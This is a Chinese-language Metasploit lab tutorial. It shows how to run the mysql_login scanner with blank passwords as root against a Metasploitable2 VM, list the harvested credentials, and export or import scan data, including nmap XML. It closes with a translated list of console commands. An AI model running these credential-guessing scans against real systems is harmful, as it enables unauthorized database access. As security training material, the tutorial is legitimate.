實戰-使用msf掃描靶機上mysql服務的空密碼
我們啟動一台Metasploitable2-Linux靶機網絡模式為橋接IP:192.168.1.180
登入Metasploitable2-Linux系統使用者名root,密碼:123456 輸入ip a 檢視ip位址
登入Kali開始搜尋子產品
msf6> search mysql_login
加載子產品
msf6 > use auxiliary/scanner/mysql/mysql_login
檢視子產品配置項
msf6 auxiliary(scanner/mysql/mysql_login) > show options
我們配置要爆破的使用者
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
參數:BLANK_PASSWORDS 含意:Try blank passwords for all users #為所有使用者嘗試空密碼 。 blank [blæŋk] 空白的
開啟為所有使用者嘗試空密碼
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
設定目标主機
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180
配置完成以後我們執行run 或者exploit
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
執行成功
使用後端憑證指令creds , 列出資料庫中的所有憑據
Credentials [krəˈdenʃlz] 憑證;證書;
msf6 auxiliary(scanner/mysql/mysql_login) > creds
以下有視訊版還有文字版
不知道怎麼操作的請看文字版的,裡面詳細的步驟。
關注公衆号俠盜男爵回複【kali系統】
将掃描的結果導出Metasploit與導入另一台機器的Metasploit中
資料庫後端指令:
db_connect 連接配接到現有的資料庫
db_disconnect 斷開與目前資料庫執行個體的連接配接
db_export 導出包含資料庫内容的檔案
db_import 導入掃描結果檔案(檔案類型将被自動檢測)
例1:将前面掃描mysql資料庫空密碼資訊導出
msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml
注:導出隻支援兩種格式:xml和pwdump
常用的導出格式為 xml
導出以後退出程式
msf6 auxiliary(scanner/mysql/mysql_login) > exit
例2:将掃描的結果導入另一台機器的Metasploit中 我們就不再開一台新Kali,直接重置資料庫,當成新的來用
┌──(rootxuegod53)-[~]
└─# msfdb reinit
連接配接Metasploit
└─# msfconsole
msf6 > hosts
資料庫中主機資訊是空的,我們導入資料
msf6 > db_import /root/bak.xml
msf6 > hosts
hosts指令有多個選項,通過 hosts -h 可以檢視
msf6 > hosts -h
在這裡,最重要的是選項 -c,此選項使我們能夠選擇要用hosts指令顯示的資料的列或字段(類似于SQL中的select指令)。在上圖中可以看到顯示的可用列。 例:顯示指定列的主機資訊
msf6 > hosts -c address,name,os_name
删除指定主機
msf6 > hosts -d 192.168.1.180
除此之外我們還可以直接将NMAP的掃描結果導入到Metasploit資料庫中我們新開一個終端視窗來進行掃描。
└─# nmap -A xuegod.cn -oX xuegod.xml
-oX 将掃描資訊導出到XML檔案中
我們回到Metasploit導入掃描結果
msf6 > db_import /root/xuegod.xml
msf5 > hosts
檢視我們資料庫中的主機都開放了哪些服務
msf5 > services
顯示指定主機的服務資訊
msf5 > services -R 101.200.128.35
擴充: 在msf指令提示符下輸入help後,顯示的指令清單和作用描述。 msf6 > help
核心指令
? 幫助菜單
banner 顯示一個metasploit橫幅
cd 更改目前的工作目錄
color 切換顔色
connect 連接配接與主機通信
exit 退出控制台
get 擷取特定于上下文的變量的值
getg 擷取全局變量的值
grep grep另一個指令的輸出 如: grep creds help
help 幫助菜單
history 顯示指令曆史
irb 進入irb腳本模式
load 加載一個架構插件
quit 退出控制台
route 通過會話路由流量
save 儲存活動的資料存儲
sessions 轉儲會話清單并顯示有關會話的資訊
set 将特定于上下文的變量設定為一個值
setg 将全局變量設定為一個值
sleep 在指定的秒數内不做任何事情
spool 将控制台輸出寫入檔案以及螢幕
threads 線程檢視和操作背景線程
unload 解除安裝架構插件
unset 取消設定一個或多個特定于上下文的變量
unsetg 取消設定一個或多個全局變量
version 顯示架構和控制台庫版本号
子產品指令
advanced 顯示一個或多個子產品的進階選項
back 從目前上下文傳回
edit 使用首選編輯器編輯目前子產品
info 顯示有關一個或多個子產品的資訊
loadpath 路徑從路徑搜尋并加載子產品
options 顯示全局選項或一個或多個子產品
popm 将最新的子產品從堆棧中彈出并使其處于活動狀态
previous 将之前加載的子產品設定為目前子產品
pushm 将活動或子產品清單推入子產品堆棧
reload_all 從所有定義的子產品路徑重新加載所有子產品
search 搜尋子產品名稱和描述
show 顯示給定類型的子產品或所有子產品
use 按名稱選擇子產品
工作指令
handler 作為作業啟動負載處理程式
jobs 顯示和管理作業
kill 殺死一個工作
rename_job 重命名作業
資源腳本指令
makerc 儲存從開始到檔案輸入的指令
resource 運作存儲在檔案中的指令
資料庫後端指令
db_connect 連接配接到現有的資料庫
db_disconnect 斷開與目前資料庫執行個體的連接配接
db_export 導出包含資料庫内容的檔案
db_import 導入掃描結果檔案(檔案類型将被自動檢測)
db_nmap 執行nmap并自動記錄輸出
db_rebuild_cache 重建資料庫存儲的子產品高速緩存
db_status 顯示目前的資料庫狀态
hosts 列出資料庫中的所有主機
loot 列出資料庫中的所有戰利品
notes 列出資料庫中的所有筆記
services 列出資料庫中的所有服務
vulns 列出資料庫中的所有漏洞
workspace 在資料庫工作區之間切換
creds 列出資料庫中的所有憑據